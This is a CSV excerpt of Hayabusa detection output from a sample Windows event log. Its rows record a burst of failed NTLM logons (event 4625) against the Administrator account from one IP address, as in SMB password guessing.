2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
